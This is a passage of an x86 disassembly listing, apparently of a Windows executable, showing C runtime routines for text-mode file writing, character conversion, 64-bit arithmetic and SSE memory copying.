		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		jmp	loc_40D9C0
; ---------------------------------------------------------------------------

loc_40D4EB:				; CODE XREF: sub_40D41A+9Cj
					; sub_40D41A+A9j
		test	byte ptr [eax+4], 20h
		jz	short loc_40D500
		push	2
		push	0
		push	0
		push	esi
		call	sub_40D27E
		add	esp, 10h

loc_40D500:				; CODE XREF: sub_40D41A+D5j
		push	esi
		call	sub_40DB00
		test	eax, eax
		pop	ecx
		jz	loc_40D705
		mov	eax, [edi]
		test	byte ptr [ebx+eax+4], 80h
		jz	loc_40D705
		call	sub_40595D
		mov	eax, [eax+6Ch]
		xor	ecx, ecx
		cmp	[eax+14h], ecx
		lea	eax, [ebp+518h+var_594]
		setz	cl
		push	eax
		mov	eax, [edi]
		push	dword ptr [ebx+eax]
		mov	esi, ecx
		call	ds:off_41E114
		test	eax, eax
		jz	loc_40D705
		test	esi, esi
		jz	short loc_40D553
		cmp	[ebp+518h+var_56D], 0
		jz	loc_40D705

loc_40D553:				; CODE XREF: sub_40D41A+12Dj
		call	ds:off_41E118
		and	[ebp+518h+var_568], 0
		cmp	[ebp+518h+arg_8], 0
		mov	esi, [ebp+518h+var_57C]
		mov	[ebp+518h+var_594], eax
		mov	[ebp+518h+var_58C], esi
		jbe	loc_40D972
		and	[ebp+518h+var_574], 0
		jmp	short loc_40D57C
; ---------------------------------------------------------------------------

loc_40D579:				; CODE XREF: sub_40D41A+2E0j
		mov	esi, [ebp+518h+var_58C]

loc_40D57C:				; CODE XREF: sub_40D41A+15Dj
		mov	al, [ebp+518h+var_56D]
		test	al, al
		jnz	loc_40D68D
		mov	al, [esi]
		xor	ecx, ecx
		cmp	al, 0Ah
		setz	cl
		movsx	eax, al
		push	eax
		mov	[ebp+518h+var_590], ecx
		call	sub_40CFF6
		test	eax, eax
		pop	ecx
		jnz	short loc_40D5BB
		push	1
		lea	eax, [ebp+518h+var_56C]
		push	esi
		push	eax
		call	sub_40FA90
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40D968
		jmp	short loc_40D5EB
; ---------------------------------------------------------------------------

loc_40D5BB:				; CODE XREF: sub_40D41A+185j
		mov	eax, [ebp+518h+var_57C]
		sub	eax, esi
		add	eax, [ebp+518h+arg_8]
		cmp	eax, 1
		jbe	loc_40D968
		push	2
		lea	eax, [ebp+518h+var_56C]
		push	esi
		push	eax
		call	sub_40FA90
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40D968
		inc	esi
		inc	[ebp+518h+var_574]

loc_40D5EB:				; CODE XREF: sub_40D41A+19Fj
		xor	eax, eax
		push	eax
		push	eax
		push	5
		lea	ecx, [ebp+518h+var_C]
		push	ecx
		push	1
		lea	ecx, [ebp+518h+var_56C]
		push	ecx
		push	eax
		push	[ebp+518h+var_594]
		inc	esi
		inc	[ebp+518h+var_574]
		mov	[ebp+518h+var_58C], esi
		call	ds:dword_41E134	; WideCharToMultiByte
		mov	esi, eax
		test	esi, esi
		jz	loc_40D968
		push	0
		lea	eax, [ebp+518h+var_568]
		push	eax
		push	esi
		lea	eax, [ebp+518h+var_C]
		push	eax
		mov	eax, [edi]
		push	dword ptr [ebx+eax]
		call	ds:off_41E088
		test	eax, eax
		jz	loc_40D95F
		mov	eax, [ebp+518h+var_568]
		add	[ebp+518h+var_578], eax
		cmp	eax, esi
		jl	loc_40D968
		cmp	[ebp+518h+var_590], 0
		jz	loc_40D6F1
		push	0
		lea	eax, [ebp+518h+var_568]
		push	eax
		push	1
		lea	eax, [ebp+518h+var_C]
		push	eax
		mov	eax, [edi]
		mov	[ebp+518h+var_C], 0Dh
		push	dword ptr [ebx+eax]
		call	ds:off_41E088
		test	eax, eax
		jz	loc_40D95F
		cmp	[ebp+518h+var_568], 1
		jl	loc_40D968
		inc	[ebp+518h+var_580]
		inc	[ebp+518h+var_578]
		jmp	short loc_40D6F1
; ---------------------------------------------------------------------------

loc_40D68D:				; CODE XREF: sub_40D41A+167j
		cmp	al, 1
		jz	short loc_40D695
		cmp	al, 2
		jnz	short loc_40D6B0

loc_40D695:				; CODE XREF: sub_40D41A+275j
		movzx	ecx, word ptr [esi]
		xor	edx, edx
		cmp	cx, 0Ah
		setz	dl
		inc	esi
		inc	esi
		add	[ebp+518h+var_574], 2
		mov	[ebp+518h+var_56C], ecx
		mov	[ebp+518h+var_58C], esi
		mov	[ebp+518h+var_590], edx

loc_40D6B0:				; CODE XREF: sub_40D41A+279j
		cmp	al, 1
		jz	short loc_40D6B8
		cmp	al, 2
		jnz	short loc_40D6F1

loc_40D6B8:				; CODE XREF: sub_40D41A+298j
		push	[ebp+518h+var_56C]
		call	sub_410A9C
		cmp	ax, word ptr [ebp+518h+var_56C]
		pop	ecx
		jnz	loc_40D95F
		inc	[ebp+518h+var_578]
		cmp	[ebp+518h+var_590], 0
		jz	short loc_40D6F1
		push	0Dh
		pop	eax
		push	eax
		mov	[ebp+518h+var_56C], eax
		call	sub_410A9C
		cmp	ax, word ptr [ebp+518h+var_56C]
		pop	ecx
		jnz	loc_40D95F
		inc	[ebp+518h+var_578]
		inc	[ebp+518h+var_580]

loc_40D6F1:				; CODE XREF: sub_40D41A+232j
					; sub_40D41A+271j ...
		mov	eax, [ebp+518h+arg_8]
		cmp	[ebp+518h+var_574], eax
		jb	loc_40D579
		jmp	loc_40D968
; ---------------------------------------------------------------------------

loc_40D705:				; CODE XREF: sub_40D41A+EFj
					; sub_40D41A+FCj ...
		mov	eax, [edi]
		add	eax, ebx
		test	byte ptr [eax+4], 80h
		jz	loc_40D938
		mov	eax, [ebp+518h+var_57C]
		xor	esi, esi
		cmp	[ebp+518h+var_56D], 0
		mov	[ebp+518h+var_56C], esi
		jnz	loc_40D7B6
		cmp	[ebp+518h+arg_8], esi
		mov	[ebp+518h+var_568], eax
		jbe	loc_40D999

loc_40D734:				; CODE XREF: sub_40D41A+395j
		mov	ecx, [ebp+518h+var_568]
		and	[ebp+518h+var_574], 0
		sub	ecx, [ebp+518h+var_57C]
		lea	eax, [ebp+518h+var_564]

loc_40D741:				; CODE XREF: sub_40D41A+354j
		cmp	ecx, [ebp+518h+arg_8]
		jnb	short loc_40D770
		mov	edx, [ebp+518h+var_568]
		inc	[ebp+518h+var_568]
		mov	dl, [edx]
		inc	ecx
		cmp	dl, 0Ah
		jnz	short loc_40D761
		inc	[ebp+518h+var_580]
		mov	byte ptr [eax],	0Dh
		inc	eax
		inc	[ebp+518h+var_574]

loc_40D761:				; CODE XREF: sub_40D41A+33Bj
		mov	[eax], dl
		inc	eax
		inc	[ebp+518h+var_574]
		cmp	[ebp+518h+var_574], 400h
		jb	short loc_40D741

loc_40D770:				; CODE XREF: sub_40D41A+32Dj
		mov	esi, eax
		lea	eax, [ebp+518h+var_564]
		sub	esi, eax
		push	0
		lea	eax, [ebp+518h+var_584]
		push	eax
		push	esi
		lea	eax, [ebp+518h+var_564]
		push	eax
		mov	eax, [edi]
		push	dword ptr [ebx+eax]
		call	ds:off_41E088
		test	eax, eax
		jz	loc_40D95F
		mov	eax, [ebp+518h+var_584]
		add	[ebp+518h+var_578], eax
		cmp	eax, esi
		jl	loc_40D968
		mov	eax, [ebp+518h+var_568]
		sub	eax, [ebp+518h+var_57C]
		cmp	eax, [ebp+518h+arg_8]
		jb	short loc_40D734
		jmp	loc_40D968
; ---------------------------------------------------------------------------

loc_40D7B6:				; CODE XREF: sub_40D41A+305j
		cmp	[ebp+518h+var_56D], 2
		jnz	loc_40D85D
		cmp	[ebp+518h+arg_8], esi
		mov	[ebp+518h+var_568], eax
		jbe	loc_40D999

loc_40D7CF:				; CODE XREF: sub_40D41A+438j
		mov	ecx, [ebp+518h+var_568]
		xor	esi, esi
		sub	ecx, [ebp+518h+var_57C]
		lea	eax, [ebp+518h+var_564]

loc_40D7DA:				; CODE XREF: sub_40D41A+3F7j
		cmp	ecx, [ebp+518h+arg_8]
		jnb	short loc_40D813
		mov	edx, [ebp+518h+var_568]
		add	[ebp+518h+var_568], 2
		movzx	edx, word ptr [edx]
		inc	ecx
		inc	ecx
		cmp	dx, 0Ah
		jnz	short loc_40D801
		add	[ebp+518h+var_580], 2
		mov	word ptr [eax],	0Dh
		inc	eax
		inc	eax
		inc	esi
		inc	esi

loc_40D801:				; CODE XREF: sub_40D41A+3D8j
		mov	edi, [ebp+518h+var_588]
		mov	[eax], dx
		inc	eax
		inc	eax
		inc	esi
		inc	esi
		cmp	esi, 3FFh
		jb	short loc_40D7DA

loc_40D813:				; CODE XREF: sub_40D41A+3C6j
		mov	esi, eax
		lea	eax, [ebp+518h+var_564]
		sub	esi, eax
		push	0
		lea	eax, [ebp+518h+var_584]
		push	eax
		push	esi
		lea	eax, [ebp+518h+var_564]
		push	eax
		mov	eax, [edi]
		push	dword ptr [ebx+eax]
		call	ds:off_41E088
		test	eax, eax
		jz	loc_40D95F
		mov	eax, [ebp+518h+var_584]
		add	[ebp+518h+var_578], eax
		cmp	eax, esi
		jl	loc_40D968
		mov	eax, [ebp+518h+var_568]
		sub	eax, [ebp+518h+var_57C]
		cmp	eax, [ebp+518h+arg_8]
		jb	loc_40D7CF
		jmp	loc_40D968
; ---------------------------------------------------------------------------

loc_40D85D:				; CODE XREF: sub_40D41A+3A0j
		cmp	[ebp+518h+arg_8], esi
		mov	[ebp+518h+var_574], eax
		jbe	loc_40D999

loc_40D86C:				; CODE XREF: sub_40D41A+516j
		mov	ecx, [ebp+518h+var_574]
		and	[ebp+518h+var_568], 0
		sub	ecx, [ebp+518h+var_57C]
		push	2
		lea	eax, [ebp+518h+var_160]
		pop	esi

loc_40D87F:				; CODE XREF: sub_40D41A+497j
		cmp	ecx, [ebp+518h+arg_8]
		jnb	short loc_40D8B3
		mov	edx, [ebp+518h+var_574]
		movzx	edx, word ptr [edx]
		add	[ebp+518h+var_574], esi
		add	ecx, esi
		cmp	dx, 0Ah
		jnz	short loc_40D8A2
		mov	word ptr [eax],	0Dh
		add	eax, esi
		add	[ebp+518h+var_568], esi

loc_40D8A2:				; CODE XREF: sub_40D41A+47Cj
		add	[ebp+518h+var_568], esi
		mov	[eax], dx
		add	eax, esi
		cmp	[ebp+518h+var_568], 152h
		jb	short loc_40D87F

loc_40D8B3:				; CODE XREF: sub_40D41A+46Bj
		xor	esi, esi
		push	esi
		push	esi
		push	2ABh
		lea	ecx, [ebp+518h+var_410]
		push	ecx
		lea	ecx, [ebp+518h+var_160]
		sub	eax, ecx
		cdq
		sub	eax, edx
		sar	eax, 1
		push	eax
		mov	eax, ecx
		push	eax
		push	esi
		push	0FDE9h
		call	ds:dword_41E134	; WideCharToMultiByte
		mov	edi, eax
		cmp	edi, esi
		jz	short loc_40D95F

loc_40D8E6:				; CODE XREF: sub_40D41A+4F6j
		push	0
		lea	eax, [ebp+518h+var_584]
		push	eax
		mov	eax, edi
		sub	eax, esi
		push	eax
		lea	eax, [ebp+esi+518h+var_410]
		push	eax
		mov	eax, [ebp+518h+var_588]
		mov	eax, [eax]
		push	dword ptr [ebx+eax]
		call	ds:off_41E088
		test	eax, eax
		jz	short loc_40D914
		add	esi, [ebp+518h+var_584]
		cmp	edi, esi
		jg	short loc_40D8E6
		jmp	short loc_40D91D
; ---------------------------------------------------------------------------

loc_40D914:				; CODE XREF: sub_40D41A+4EFj
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		mov	[ebp+518h+var_56C], eax

loc_40D91D:				; CODE XREF: sub_40D41A+4F8j
		cmp	edi, esi
		jg	short loc_40D968
		mov	eax, [ebp+518h+var_574]
		sub	eax, [ebp+518h+var_57C]
		cmp	eax, [ebp+518h+arg_8]
		mov	[ebp+518h+var_578], eax
		jb	loc_40D86C
		jmp	short loc_40D968
; ---------------------------------------------------------------------------

loc_40D938:				; CODE XREF: sub_40D41A+2F3j
		push	0
		lea	ecx, [ebp+518h+var_584]
		push	ecx
		push	[ebp+518h+arg_8]
		push	[ebp+518h+var_57C]
		push	dword ptr [eax]
		call	ds:off_41E088
		test	eax, eax
		jz	short loc_40D95F
		mov	eax, [ebp+518h+var_584]
		and	[ebp+518h+var_56C], 0
		mov	[ebp+518h+var_578], eax
		jmp	short loc_40D968
; ---------------------------------------------------------------------------

loc_40D95F:				; CODE XREF: sub_40D41A+21Aj
					; sub_40D41A+25Bj ...
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		mov	[ebp+518h+var_56C], eax

loc_40D968:				; CODE XREF: sub_40D41A+199j
					; sub_40D41A+1AFj ...
		mov	eax, [ebp+518h+var_578]
		test	eax, eax
		jnz	short loc_40D9C5
		mov	edi, [ebp+518h+var_588]

loc_40D972:				; CODE XREF: sub_40D41A+153j
		xor	esi, esi
		cmp	[ebp+518h+var_56C], esi
		jz	short loc_40D999
		push	5
		pop	esi
		cmp	[ebp+518h+var_56C], esi
		jnz	short loc_40D98E
		call	sub_405D93
		mov	dword ptr [eax], 9
		jmp	short loc_40D9B9
; ---------------------------------------------------------------------------

loc_40D98E:				; CODE XREF: sub_40D41A+565j
		push	[ebp+518h+var_56C]
		call	sub_405DB9
		pop	ecx
		jmp	short loc_40D9C0
; ---------------------------------------------------------------------------

loc_40D999:				; CODE XREF: sub_40D41A+314j
					; sub_40D41A+3AFj ...
		mov	eax, [edi]
		test	byte ptr [ebx+eax+4], 40h
		jz	short loc_40D9AE
		mov	eax, [ebp+518h+var_57C]
		cmp	byte ptr [eax],	1Ah
		jnz	short loc_40D9AE
		xor	eax, eax
		jmp	short loc_40D9C8
; ---------------------------------------------------------------------------

loc_40D9AE:				; CODE XREF: sub_40D41A+586j
					; sub_40D41A+58Ej
		call	sub_405D93
		mov	dword ptr [eax], 1Ch

loc_40D9B9:				; CODE XREF: sub_40D41A+572j
		call	sub_405DA6
		mov	[eax], esi

loc_40D9C0:				; CODE XREF: sub_40D41A+CCj
					; sub_40D41A+57Dj
		or	eax, 0FFFFFFFFh
		jmp	short loc_40D9C8
; ---------------------------------------------------------------------------

loc_40D9C5:				; CODE XREF: sub_40D41A+553j
		sub	eax, [ebp+518h+var_580]

loc_40D9C8:				; CODE XREF: sub_40D41A+592j
					; sub_40D41A+5A9j
		pop	edi
		pop	ebx

loc_40D9CA:				; CODE XREF: sub_40D41A+37j
					; sub_40D41A+62j
		mov	ecx, [ebp+518h+var_4]
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		add	ebp, 518h
		leave
		retn
sub_40D41A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D9E0	proc near		; CODE XREF: sub_406D96+CBp
					; sub_406D96+13Ap ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	10h
		push	offset dword_422D10
		call	__SEH_prolog4
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40DA0F
		call	sub_405DA6
		and	dword ptr [eax], 0
		call	sub_405D93
		mov	dword ptr [eax], 9

loc_40DA07:				; CODE XREF: sub_40D9E0+5Cj
		or	eax, 0FFFFFFFFh
		jmp	loc_40DAAC
; ---------------------------------------------------------------------------

loc_40DA0F:				; CODE XREF: sub_40D9E0+12j
		xor	edi, edi
		cmp	eax, edi
		jl	short loc_40DA1D
		cmp	eax, dword_437EA4
		jb	short loc_40DA3E

loc_40DA1D:				; CODE XREF: sub_40D9E0+33j
					; sub_40D9E0+7Cj
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_40DA07
; ---------------------------------------------------------------------------

loc_40DA3E:				; CODE XREF: sub_40D9E0+3Bj
		mov	ecx, eax
		sar	ecx, 5
		lea	ebx, ds:437EC0h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [ebx]
		movzx	ecx, byte ptr [ecx+esi+4]
		and	ecx, 1
		jz	short loc_40DA1D
		push	eax
		call	sub_40F3AE
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		mov	eax, [ebx]
		test	byte ptr [eax+esi+4], 1
		jz	short loc_40DA87
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40D41A
		add	esp, 0Ch
		mov	[ebp+var_1C], eax
		jmp	short loc_40DA9D
; ---------------------------------------------------------------------------

loc_40DA87:				; CODE XREF: sub_40D9E0+8Fj
		call	sub_405D93
		mov	dword ptr [eax], 9
		call	sub_405DA6
		mov	[eax], edi
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40DA9D:				; CODE XREF: sub_40D9E0+A5j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40DAB2
		mov	eax, [ebp+var_1C]

loc_40DAAC:				; CODE XREF: sub_40D9E0+2Aj
		call	__SEH_epilog4
		retn
sub_40D9E0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DAB2	proc near		; CODE XREF: sub_40D9E0+C4p
					; DATA XREF: zcrshv4o:00422D28o
		push	dword ptr [ebp+8]
		call	sub_40F44E
		pop	ecx
		retn
sub_40DAB2	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DABC	proc near		; CODE XREF: sub_406D96+9Cp
					; sub_40A24D+58p ...

arg_0		= dword	ptr  4

		inc	dword_428AE8
		push	1000h
		call	sub_407CFA
		test	eax, eax
		pop	ecx
		mov	ecx, [esp+arg_0]
		mov	[ecx+8], eax
		jz	short loc_40DAE5
		or	dword ptr [ecx+0Ch], 8
		mov	dword ptr [ecx+18h], 1000h
		jmp	short loc_40DAF6
; ---------------------------------------------------------------------------

loc_40DAE5:				; CODE XREF: sub_40DABC+1Aj
		or	dword ptr [ecx+0Ch], 4
		lea	eax, [ecx+14h]
		mov	[ecx+8], eax
		mov	dword ptr [ecx+18h], 2

loc_40DAF6:				; CODE XREF: sub_40DABC+27j
		mov	eax, [ecx+8]
		and	dword ptr [ecx+4], 0
		mov	[ecx], eax
		retn
sub_40DABC	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DB00	proc near		; CODE XREF: sub_406D96+91p
					; sub_408CDB+Cp ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40DB17
		call	sub_405D93
		mov	dword ptr [eax], 9
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_40DB17:				; CODE XREF: sub_40DB00+7j
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jl	short loc_40DB26
		cmp	eax, dword_437EA4
		jb	short loc_40DB42

loc_40DB26:				; CODE XREF: sub_40DB00+1Cj
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 9
		call	sub_4034C7
		add	esp, 14h
		xor	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40DB42:				; CODE XREF: sub_40DB00+24j
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_437EC0[ecx*4]
		movzx	eax, byte ptr [ecx+eax+4]
		and	eax, 40h
		pop	esi
		retn
sub_40DB00	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DB5E	proc near		; CODE XREF: sub_407F39:loc_407F5Cp
		push	esi
		push	edi
		xor	edi, edi

loc_40DB62:				; CODE XREF: sub_40DB5E+1Aj
		lea	esi, off_424F80[edi]
		push	dword ptr [esi]
		call	sub_4056E7
		add	edi, 4
		cmp	edi, 28h
		pop	ecx
		mov	[esi], eax
		jb	short loc_40DB62
		pop	edi
		pop	esi
		retn
sub_40DB5E	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DB7D	proc near		; CODE XREF: sub_406F97+554p
		mov	eax, dword_424064
		or	eax, 1
		xor	ecx, ecx
		cmp	dword_428F40, eax
		setz	cl
		mov	eax, ecx
		retn
sub_40DB7D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40DB93	proc near		; CODE XREF: sub_40DCF2+12p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= word ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		mov	esi, [ebp+arg_4]
		xor	ebx, ebx
		cmp	esi, ebx
		push	edi
		mov	edi, [ebp+arg_8]
		jnz	short loc_40DBB9
		cmp	edi, ebx
		jbe	short loc_40DBB9
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40DBB5
		mov	[eax], ebx

loc_40DBB5:				; CODE XREF: sub_40DB93+1Ej
					; sub_40DB93+ECj ...
		xor	eax, eax
		jmp	short loc_40DC38
; ---------------------------------------------------------------------------

loc_40DBB9:				; CODE XREF: sub_40DB93+13j
					; sub_40DB93+17j
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40DBC3
		or	dword ptr [eax], 0FFFFFFFFh

loc_40DBC3:				; CODE XREF: sub_40DB93+2Bj
		cmp	edi, 7FFFFFFFh
		jbe	short loc_40DBE6
		call	sub_405D93
		push	16h
		pop	esi
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4034C7
		add	esp, 14h

loc_40DBE2:				; CODE XREF: sub_40DB93+CCj
					; sub_40DB93+D5j
		mov	eax, esi
		jmp	short loc_40DC38
; ---------------------------------------------------------------------------

loc_40DBE6:				; CODE XREF: sub_40DB93+36j
		push	[ebp+arg_10]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	eax, [ebp+var_10]
		cmp	[eax+14h], ebx
		jnz	loc_40DC91
		mov	ax, [ebp+arg_C]
		cmp	ax, 0FFh
		jbe	short loc_40DC3D
		cmp	esi, ebx
		jz	short loc_40DC1A
		cmp	edi, ebx
		jbe	short loc_40DC1A
		push	edi
		push	ebx
		push	esi
		call	sub_408130
		add	esp, 0Ch

loc_40DC1A:				; CODE XREF: sub_40DB93+76j
					; sub_40DB93+7Aj ...
		call	sub_405D93
		mov	dword ptr [eax], 2Ah
		call	sub_405D93
		cmp	[ebp+var_4], bl
		mov	eax, [eax]
		jz	short loc_40DC38
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

loc_40DC38:				; CODE XREF: sub_40DB93+24j
					; sub_40DB93+51j ...
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_40DC3D:				; CODE XREF: sub_40DB93+72j
		cmp	esi, ebx
		jz	short loc_40DC6F
		cmp	edi, ebx
		ja	short loc_40DC6D

loc_40DC45:				; CODE XREF: sub_40DB93+141j
					; sub_40DB93+149j ...
		call	sub_405D93
		push	22h
		pop	esi
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_40DBE2
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh
		jmp	loc_40DBE2
; ---------------------------------------------------------------------------

loc_40DC6D:				; CODE XREF: sub_40DB93+B0j
		mov	[esi], al

loc_40DC6F:				; CODE XREF: sub_40DB93+ACj
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40DC7C
		mov	dword ptr [eax], 1

loc_40DC7C:				; CODE XREF: sub_40DB93+E1j
					; sub_40DB93+12Aj ...
		cmp	[ebp+var_4], bl
		jz	loc_40DBB5
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh
		jmp	loc_40DBB5
; ---------------------------------------------------------------------------

loc_40DC91:				; CODE XREF: sub_40DB93+64j
		lea	ecx, [ebp+arg_4]
		push	ecx
		push	ebx
		push	edi
		push	esi
		push	1
		lea	ecx, [ebp+arg_C]
		push	ecx
		push	ebx
		mov	[ebp+arg_4], ebx
		push	dword ptr [eax+4]
		call	ds:dword_41E134	; WideCharToMultiByte
		cmp	eax, ebx
		jz	short loc_40DCC3
		cmp	[ebp+arg_4], ebx
		jnz	loc_40DC1A
		mov	ecx, [ebp+arg_0]
		cmp	ecx, ebx
		jz	short loc_40DC7C
		mov	[ecx], eax
		jmp	short loc_40DC7C
; ---------------------------------------------------------------------------

loc_40DCC3:				; CODE XREF: sub_40DB93+11Aj
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 7Ah
		jnz	loc_40DC1A
		cmp	esi, ebx
		jz	loc_40DC45
		cmp	edi, ebx
		jbe	loc_40DC45
		push	edi
		push	ebx
		push	esi
		call	sub_408130
		add	esp, 0Ch
		jmp	loc_40DC45
sub_40DB93	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DCF2	proc near		; CODE XREF: sub_406F97+487p
					; sub_406F97+8B1p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	0
		push	[esp+4+arg_C]
		push	[esp+8+arg_8]
		push	[esp+0Ch+arg_4]
		push	[esp+10h+arg_0]
		call	sub_40DB93
		add	esp, 14h
		retn
sub_40DCF2	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_40DD10	proc near		; CODE XREF: sub_406F97+786p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	esi
		mov	eax, [esp+4+arg_C]
		or	eax, eax
		jnz	short loc_40DD41
		mov	ecx, [esp+4+arg_8]
		mov	eax, [esp+4+arg_4]
		xor	edx, edx
		div	ecx
		mov	ebx, eax
		mov	eax, [esp+4+arg_0]
		div	ecx
		mov	esi, eax
		mov	eax, ebx
		mul	[esp+4+arg_8]
		mov	ecx, eax
		mov	eax, esi
		mul	[esp+4+arg_8]
		add	edx, ecx
		jmp	short loc_40DD88
; ---------------------------------------------------------------------------

loc_40DD41:				; CODE XREF: sub_40DD10+7j
		mov	ecx, eax
		mov	ebx, [esp+4+arg_8]
		mov	edx, [esp+4+arg_4]
		mov	eax, [esp+4+arg_0]

loc_40DD4F:				; CODE XREF: sub_40DD10+49j
		shr	ecx, 1
		rcr	ebx, 1
		shr	edx, 1
		rcr	eax, 1
		or	ecx, ecx
		jnz	short loc_40DD4F
		div	ebx
		mov	esi, eax
		mul	[esp+4+arg_C]
		mov	ecx, eax
		mov	eax, [esp+4+arg_8]
		mul	esi
		add	edx, ecx
		jb	short loc_40DD7D
		cmp	edx, [esp+4+arg_4]
		ja	short loc_40DD7D
		jb	short loc_40DD86
		cmp	eax, [esp+4+arg_0]
		jbe	short loc_40DD86

loc_40DD7D:				; CODE XREF: sub_40DD10+5Dj
					; sub_40DD10+63j
		dec	esi
		sub	eax, [esp+4+arg_8]
		sbb	edx, [esp+4+arg_C]

loc_40DD86:				; CODE XREF: sub_40DD10+65j
					; sub_40DD10+6Bj
		xor	ebx, ebx

loc_40DD88:				; CODE XREF: sub_40DD10+2Fj
		sub	eax, [esp+4+arg_0]
		sbb	edx, [esp+4+arg_4]
		neg	edx
		neg	eax
		sbb	edx, 0
		mov	ecx, edx
		mov	edx, ebx
		mov	ebx, ecx
		mov	ecx, eax
		mov	eax, esi
		pop	esi
		retn	10h
sub_40DD10	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40DDA5	proc near		; CODE XREF: sub_40DE2C+4Dp

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 8
		mov	[ebp+var_4], edi
		mov	[ebp+var_8], esi
		mov	esi, [ebp+arg_4]
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+arg_8]
		shr	ecx, 7
		jmp	short loc_40DDC5
; ---------------------------------------------------------------------------
		db 8Dh,	9Bh, 4 dup(0)
; ---------------------------------------------------------------------------

loc_40DDC5:				; CODE XREF: sub_40DDA5+18j
					; sub_40DDA5+7Bj
		movdqa	xmm0, oword ptr	[esi]
		movdqa	xmm1, oword ptr	[esi+10h]
		movdqa	xmm2, oword ptr	[esi+20h]
		movdqa	xmm3, oword ptr	[esi+30h]
		movdqa	oword ptr [edi], xmm0
		movdqa	oword ptr [edi+10h], xmm1
		movdqa	oword ptr [edi+20h], xmm2
		movdqa	oword ptr [edi+30h], xmm3
		movdqa	xmm4, oword ptr	[esi+40h]
		movdqa	xmm5, oword ptr	[esi+50h]
		movdqa	xmm6, oword ptr	[esi+60h]
		movdqa	xmm7, oword ptr	[esi+70h]
		movdqa	oword ptr [edi+40h], xmm4
		movdqa	oword ptr [edi+50h], xmm5
		movdqa	oword ptr [edi+60h], xmm6
		movdqa	oword ptr [edi+70h], xmm7
		lea	esi, [esi+80h]
		lea	edi, [edi+80h]
		dec	ecx
		jnz	short loc_40DDC5
		mov	esi, [ebp+var_8]
		mov	edi, [ebp+var_4]
		mov	esp, ebp
		pop	ebp
		retn
sub_40DDA5	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40DE2C	proc near		; CODE XREF: sub_407930+42j
					; sub_4081B0+42j ...

var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
